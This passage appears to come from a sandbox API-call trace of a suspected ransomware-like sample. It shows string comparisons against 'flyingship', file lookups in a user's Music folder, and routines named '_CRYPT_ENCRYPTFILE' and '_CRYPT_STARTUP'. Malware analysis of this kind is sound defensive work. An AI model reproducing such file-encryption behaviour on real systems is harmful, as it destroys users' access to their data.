HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZNbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NbvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bvqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vqKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qKQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KQ2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uR4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UOsf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Osf8q.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.528] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0186.528] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.528] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.528] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.529] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.529] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0186.529] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.529] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.529] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0186.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd34cb0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x4145b680, ftLastAccessTime.dwHighDateTime=0x1d5de2d, ftLastWriteTime.dwLowDateTime=0x4145b680, ftLastWriteTime.dwHighDateTime=0x1d5de2d, nFileSizeHigh=0x0, nFileSizeLow=0x7b69, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="y3qZNbvqKQ2uR4UOsf8q.wav", cAlternateFileName="Y3QZNB~1.WAV")) returned 0x90ae18 [0186.530] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.530] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.530] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.530] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 